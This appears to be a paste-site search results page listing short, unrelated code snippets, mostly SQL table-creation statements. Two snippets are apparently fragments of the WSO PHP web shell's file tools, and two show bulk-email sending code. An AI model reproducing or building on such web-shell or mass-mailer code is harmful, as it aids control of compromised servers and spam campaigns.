42.7K results in 787 ms
5 years ago · Feb 02, 2020, 10:40 PM
this.password.set(password); } } _________________________________________________________________ KORISNICI.DB.SQL BEGIN TRANSACTION; CREATE TABLE IF NOT EXISTS "korisnik" ( "id" INTEGER, "ime" TEXT, "prezime" TEXT,
5 years ago · Feb 02, 2020, 09:14 PM
enema) should be scheduled if not recently performed. If the
5 years ago · Feb 02, 2020, 09:00 PM
value float, type bit);" ); }); //"create table if not exists seriesTwo (id integer primary
5 years ago · Feb 02, 2020, 08:32 PM
debug] 2020-02-02T16:37:14 43 SQL: "CREATE TABLE IF NOT EXISTS characters (id BIGINT PRIMARY
5 years ago · Feb 02, 2020, 08:04 PM
dropped from the controlfile. If a file exists in FILE$ but not in the controlfile, a
5 years ago · Feb 02, 2020, 07:40 PM
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} // recieve query for create table structure $res = mysql_query("SHOW
5 years ago · Feb 02, 2020, 06:02 PM
attaching to Event e, create table for it. if not self.evs[e][self.lock] then --If first
5 years ago · Feb 02, 2020, 03:38 PM
for both of you. If not, you both gain [color=purple]+5%
5 years ago · Feb 02, 2020, 02:44 PM
not null, bank_account_id int(11) not null ); create table bank_accounts ( id int(11) primary
5 years ago · Feb 02, 2020, 02:14 PM
string and the extra table prevents errors. if not oreQuarry or not inspectFunc
5 years ago · Feb 02, 2020, 02:04 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
5 years ago · Feb 02, 2020, 01:26 PM
USE mydb; DROP TABLE IF EXISTS courses, teachers, students, coursestudents; CREATE TABLE courses ( id int(11)
5 years ago · Feb 02, 2020, 12:24 PM
end writefile("ProjectBullshit.txt", HTTP:JSONEncode(temp)) end) if not succ then error(out) end
5 years ago · Feb 02, 2020, 09:04 AM
EXISTS `creditcards`; DROP TABLE IF EXISTS `users`; CREATE TABLE `companies` ( `CompanyName` varchar(255) NOT NULL, `About` longtext, PRIMARY
5 years ago · Feb 02, 2020, 08:28 AM
was to be omitted. # (If the table exists but is defined differently
5 years ago · Feb 02, 2020, 06:54 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
5 years ago · Feb 02, 2020, 06:04 AM
hrrt; SELECT * FROM hrrt.wp_mcp_banner_section; CREATE TEMPORARY TABLE if not exists tmptable SELECT * FROM wp_mcp_banner_section
5 years ago · Feb 02, 2020, 06:00 AM
import "database/sql" const managersDDL = ` CREATE TABLE IF NOT EXISTS managers ( id INTEGER PRIMARY
5 years ago · Feb 02, 2020, 03:38 AM
if ($max_emails) { $numemails = $max_emails; } if ($numemails > $tot_emails) { $numemails = $tot_emails; } /** * Create SMTP */ $smtpMailer = new SMTPMailer();
5 years ago · Feb 02, 2020, 02:56 AM
if ($max_emails) { $numemails = $max_emails; } if ($numemails > $tot_emails) { $numemails = $tot_emails; } /** * Create SMTP */ $smtpMailer = new SMTPMailer();
Total pages: 2134